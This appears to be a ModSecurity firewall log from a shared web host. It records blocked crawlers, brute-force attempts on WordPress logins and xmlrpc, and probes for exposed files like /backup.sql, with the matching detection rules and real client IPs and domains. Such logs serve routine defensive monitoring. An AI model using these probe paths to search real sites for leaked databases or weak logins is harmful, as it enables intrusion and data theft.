[Tue May 26 17:44:34.095827 2026] [security2:error] [pid 924957:tid 925201] [client 184.154.36.177:34626] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mpdpl.in"] [uri "/js/sal.js"] [unique_id "ahWOquYv2AvxeXULfJdcqAAAAHI"]
[Tue May 26 17:44:34.318348 2026] [security2:error] [pid 924957:tid 925203] [client 43.229.135.118:59392] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWOqeYv2AvxeXULfJdcpgAAAHQ"], referer: https://moderatorpublishing.com/x/cdn/?https://cagmedya.com
[Tue May 26 17:44:35.472882 2026] [security2:error] [pid 924957:tid 925110] [client 185.191.171.15:49128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/9/"] [unique_id "ahWOq-Yv2AvxeXULfJdc1wAAABc"]
[Tue May 26 17:44:35.473018 2026] [security2:error] [pid 924957:tid 925110] [client 185.191.171.15:49128] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/9/"] [unique_id "ahWOq-Yv2AvxeXULfJdc1wAAABc"]
[Tue May 26 17:44:35.875864 2026] [security2:error] [pid 924957:tid 924961] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backup.sql"] [unique_id "ahWOq-Yv2AvxeXULfJdc4gAACwM"]
[Tue May 26 17:44:36.064749 2026] [security2:error] [pid 924957:tid 925099] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOq-Yv2AvxeXULfJdc3gAAAAw"]
[Tue May 26 17:44:36.154342 2026] [security2:error] [pid 924957:tid 924962] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/db.sql"] [unique_id "ahWOrOYv2AvxeXULfJdc8AAAaQQ"]
[Tue May 26 17:44:37.014710 2026] [security2:error] [pid 924957:tid 925168] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOrOYv2AvxeXULfJdc-QAAAFE"]
[Tue May 26 17:44:37.421161 2026] [security2:error] [pid 924957:tid 925181] [client 47.128.46.94:17706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/cicodev-africa/governance-of-cicodev/steering-committee"] [unique_id "ahWOreYv2AvxeXULfJddFQAAAF4"]
[Tue May 26 17:44:38.526843 2026] [security2:error] [pid 924957:tid 925092] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOruYv2AvxeXULfJddLQAAAAU"]
[Tue May 26 17:44:39.048643 2026] [security2:error] [pid 924957:tid 925139] [client 185.191.171.6:23732] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/sitemap.xml"] [unique_id "ahWOr-Yv2AvxeXULfJddSgAAADQ"]
[Tue May 26 17:44:39.048774 2026] [security2:error] [pid 924957:tid 925139] [client 185.191.171.6:23732] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "mahehealthcare.com"] [uri "/sitemap.xml"] [unique_id "ahWOr-Yv2AvxeXULfJddSgAAADQ"]
[Tue May 26 17:44:41.039060 2026] [security2:error] [pid 924957:tid 925181] [client 14.168.13.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOsOYv2AvxeXULfJddhQAAAF4"]
[Tue May 26 17:44:41.562401 2026] [security2:error] [pid 924957:tid 925159] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOseYv2AvxeXULfJddmwAAAEg"]
[Tue May 26 17:44:42.070332 2026] [security2:error] [pid 924957:tid 925105] [client 138.99.37.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWOsOYv2AvxeXULfJddfwAAABI"], referer: http://bloggertarget.com/
[Tue May 26 17:44:43.157784 2026] [security2:error] [pid 924957:tid 925160] [client 31.57.184.20:59350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cloudflare-resolve-to.cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWOs-Yv2AvxeXULfJdd2QAAAEk"]
[Tue May 26 17:44:43.583893 2026] [security2:error] [pid 924957:tid 925141] [client 31.57.184.20:59714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cloudflare-resolve-to.cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWOs-Yv2AvxeXULfJdd6AAAADY"], referer: https://www.google.com/
[Tue May 26 17:44:43.874896 2026] [security2:error] [pid 924957:tid 925186] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOs-Yv2AvxeXULfJdd5wAAAGM"]
[Tue May 26 17:44:44.210872 2026] [security2:error] [pid 924957:tid 925019] [remote 109.205.180.55:59166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWOtOYv2AvxeXULfJdd8gAAET0"]
[Tue May 26 17:44:46.186037 2026] [security2:error] [pid 924957:tid 925166] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOteYv2AvxeXULfJdeIgAAAE8"]
[Tue May 26 17:44:46.793202 2026] [security2:error] [pid 924957:tid 925008] [remote 209.145.62.147:57816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.62.145.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOtuYv2AvxeXULfJdePwAAGTI"]
[Tue May 26 17:44:48.457820 2026] [security2:error] [pid 924957:tid 925106] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOuOYv2AvxeXULfJdeZAAAABM"]
[Tue May 26 17:44:50.169311 2026] [security2:error] [pid 924957:tid 925144] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOueYv2AvxeXULfJdejQAAADk"]
[Tue May 26 17:44:52.341447 2026] [security2:error] [pid 924957:tid 925043] [remote 45.32.67.165:49546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOvOYv2AvxeXULfJdeyAAACVU"]
[Tue May 26 17:44:53.079084 2026] [security2:error] [pid 924957:tid 925159] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOvOYv2AvxeXULfJde2wAAAEg"]
[Tue May 26 17:44:55.493217 2026] [security2:error] [pid 924957:tid 925115] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOv-Yv2AvxeXULfJdfFwAAABw"]
[Tue May 26 17:44:57.134454 2026] [security2:error] [pid 924957:tid 925013] [remote 88.198.165.116:49574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWOwOYv2AvxeXULfJdfRgAACDc"]
[Tue May 26 17:44:57.204925 2026] [security2:error] [pid 924957:tid 925017] [remote 94.23.188.215:52342] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "abilitypneumaticsystems.com"] [uri "/robots.txt"] [unique_id "ahWOweYv2AvxeXULfJdfTQAATTs"]
[Tue May 26 17:44:57.205134 2026] [security2:error] [pid 924957:tid 925164] [client 94.23.188.215:52342] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "abilitypneumaticsystems.com"] [uri "/robots.txt"] [unique_id "ahWOweYv2AvxeXULfJdfTQAATTs"]
[Tue May 26 17:44:57.775035 2026] [security2:error] [pid 924957:tid 925116] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOweYv2AvxeXULfJdfUwAAAB0"]
[Tue May 26 17:44:58.724955 2026] [security2:error] [pid 924957:tid 925031] [remote 142.44.228.221:49406] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "abilitypneumaticsystems.com"] [uri "/"] [unique_id "ahWOwuYv2AvxeXULfJdfdgAAIUk"]
[Tue May 26 17:44:58.725144 2026] [security2:error] [pid 924957:tid 925120] [client 142.44.228.221:49406] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "abilitypneumaticsystems.com"] [uri "/"] [unique_id "ahWOwuYv2AvxeXULfJdfdgAAIUk"]
[Tue May 26 17:45:00.224645 2026] [security2:error] [pid 924957:tid 925107] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOw-Yv2AvxeXULfJdflAAAABQ"]
[Tue May 26 17:45:00.435856 2026] [security2:error] [pid 924957:tid 925183] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/index.php"] [unique_id "ahWOw-Yv2AvxeXULfJdflwAAAGA"]
[Tue May 26 17:45:00.436435 2026] [security2:error] [pid 924957:tid 925116] [client 45.148.10.159:55312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/"] [unique_id "ahWOw-Yv2AvxeXULfJdflQAAAB0"]
[Tue May 26 17:45:02.711997 2026] [security2:error] [pid 924957:tid 925175] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOxuYv2AvxeXULfJdfygAAAFg"]
[Tue May 26 17:45:04.258076 2026] [security2:error] [pid 924957:tid 925136] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOx-Yv2AvxeXULfJdf9gAAADE"]
[Tue May 26 17:45:06.690500 2026] [security2:error] [pid 924957:tid 925191] [client 157.245.139.219:52248] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koneksi.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWOyuYv2AvxeXULfJdgQQAAAGg"]
[Tue May 26 17:45:07.116899 2026] [security2:error] [pid 924957:tid 925170] [client 157.245.139.219:52359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.139.245.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWOyuYv2AvxeXULfJdgRQAAAFM"]
[Tue May 26 17:45:07.220328 2026] [security2:error] [pid 924957:tid 925096] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOyuYv2AvxeXULfJdgRAAAAAk"]
[Tue May 26 17:45:07.292844 2026] [security2:error] [pid 924957:tid 925160] [client 103.123.226.10:61001] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/"] [unique_id "ahWOy-Yv2AvxeXULfJdgSgAAAEk"]
[Tue May 26 17:45:07.462739 2026] [security2:error] [pid 924957:tid 925160] [client 103.123.226.10:61001] ModSecurity: Warning. Matched phrase "Masscan" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWOy-Yv2AvxeXULfJdgSgAAAEk"]
[Tue May 26 17:45:08.863605 2026] [security2:error] [pid 924957:tid 925157] [client 45.148.10.159:54990] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "mail.taotechservices.com"] [uri "/"] [unique_id "ahWOzOYv2AvxeXULfJdgdgAAAEY"]
[Tue May 26 17:45:10.070431 2026] [security2:error] [pid 924957:tid 925094] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOzeYv2AvxeXULfJdglwAAAAc"]
[Tue May 26 17:45:11.703042 2026] [security2:error] [pid 924957:tid 925210] [client 113.167.239.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOz-Yv2AvxeXULfJdgvwAAAHs"]
[Tue May 26 17:45:11.841445 2026] [security2:error] [pid 924957:tid 925108] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOz-Yv2AvxeXULfJdgyAAAABU"]
[Tue May 26 17:45:14.239704 2026] [security2:error] [pid 924957:tid 925185] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO0eYv2AvxeXULfJdhEwAAAGI"]
[Tue May 26 17:45:14.685492 2026] [security2:error] [pid 924957:tid 924998] [remote 3.208.180.187:56168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWO0uYv2AvxeXULfJdhHQAAdig"]
[Tue May 26 17:45:16.831867 2026] [security2:error] [pid 924957:tid 925178] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO1OYv2AvxeXULfJdhSQAAAFs"]
[Tue May 26 17:45:17.393682 2026] [security2:error] [pid 924957:tid 925021] [remote 216.73.216.30:36453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWO1eYv2AvxeXULfJdhYgAAFj8"]
[Tue May 26 17:45:18.402571 2026] [security2:error] [pid 924957:tid 925160] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO1eYv2AvxeXULfJdhdgAAAEk"]
[Tue May 26 17:45:18.849707 2026] [security2:error] [pid 924957:tid 925008] [remote 173.212.245.56:46316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWO1uYv2AvxeXULfJdhiAAAYTI"]
[Tue May 26 17:45:19.641960 2026] [security2:error] [pid 924957:tid 925003] [remote 222.165.190.235:40070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWO1-Yv2AvxeXULfJdhlgAAaS0"]
[Tue May 26 17:45:20.867958 2026] [security2:error] [pid 924957:tid 925111] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO2OYv2AvxeXULfJdhtAAAABg"]
[Tue May 26 17:45:21.365247 2026] [security2:error] [pid 924957:tid 925192] [client 157.245.139.219:54200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.139.245.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWO2eYv2AvxeXULfJdh0AAAAGk"]
[Tue May 26 17:45:21.365356 2026] [security2:error] [pid 924957:tid 925192] [client 157.245.139.219:54200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "koneksi.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWO2eYv2AvxeXULfJdh0AAAAGk"]
[Tue May 26 17:45:23.832249 2026] [security2:error] [pid 924957:tid 925136] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO2-Yv2AvxeXULfJdiAwAAADE"]
[Tue May 26 17:45:25.575104 2026] [security2:error] [pid 924957:tid 925177] [client 45.38.215.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWO3OYv2AvxeXULfJdiKQAAAFo"]
[Tue May 26 17:45:26.082489 2026] [security2:error] [pid 924957:tid 925176] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO3eYv2AvxeXULfJdiRAAAAFk"]
[Tue May 26 17:45:26.664426 2026] [security2:error] [pid 924957:tid 925209] [client 146.56.204.198:58801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/web/H-ui.admin.page_v3.1.1.1/H-ui.admin.page/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWO3uYv2AvxeXULfJdiXAAAAHo"]
[Tue May 26 17:45:27.816598 2026] [security2:error] [pid 924957:tid 925012] [remote 103.230.156.120:60336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWO3-Yv2AvxeXULfJdidwAAUTY"]
[Tue May 26 17:45:28.321241 2026] [security2:error] [pid 924957:tid 925102] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO3-Yv2AvxeXULfJdifgAAAA8"]
[Tue May 26 17:45:30.817406 2026] [security2:error] [pid 924957:tid 925150] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO4uYv2AvxeXULfJdiugAAAD8"]
